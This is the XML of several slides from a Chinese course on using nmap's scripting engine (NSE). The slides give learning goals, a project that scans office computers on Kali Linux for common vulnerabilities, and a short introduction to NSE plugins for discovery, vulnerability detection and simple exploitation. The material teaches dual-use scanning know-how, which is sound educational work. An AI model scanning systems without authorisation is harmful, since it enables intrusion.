                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够了解脚本扫描基础知识。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够使用namp工具进行脚本扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>本项目利用Kali Linux操作系统中nmap工具的脚本扫描功能，对在线办公计算机进行常见漏洞扫描排查。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="5554701" y="1118051"/>
            <a:ext cx="5442585" cy="2500630"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5442585" cy="2500630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4777105" cy="2168525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 虽然nmap的功能已经很强大，但是在某些情况下仍需要反复扫描才能够探测到服务器的信息，这时候就需要NSE 插件实现这个功能。NSE 插件能够完成网络发现、复杂版本探测、脆弱性探测、简单漏洞利用等功能。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1541145" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>NSE插件简介</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="2799080"/>
